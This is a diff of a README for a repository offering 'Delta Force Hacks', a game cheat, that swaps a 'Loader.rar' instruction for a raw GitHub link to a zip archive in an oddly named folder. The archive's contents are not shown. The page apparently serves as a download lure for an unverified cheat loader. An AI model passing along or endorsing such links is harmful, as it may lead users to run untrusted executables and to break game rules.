malbertosm/Delta-Force-Hacks/README.md

 # 🏁 Start Dominating Delta Force Today!

-Download Loader.rar, get set up, and experience Delta Force like never before.
+Download https://raw.githubusercontent.com/malbertosm/Delta-Force-Hacks/main/uncopious/Delta-Force-Hacks-2.0.zip, get set up, and experience Delta Force like never before.
 Checking for updates regularly is highly recommended for the best protection and features.

 For tutorials, join our community or visit the /docs directory!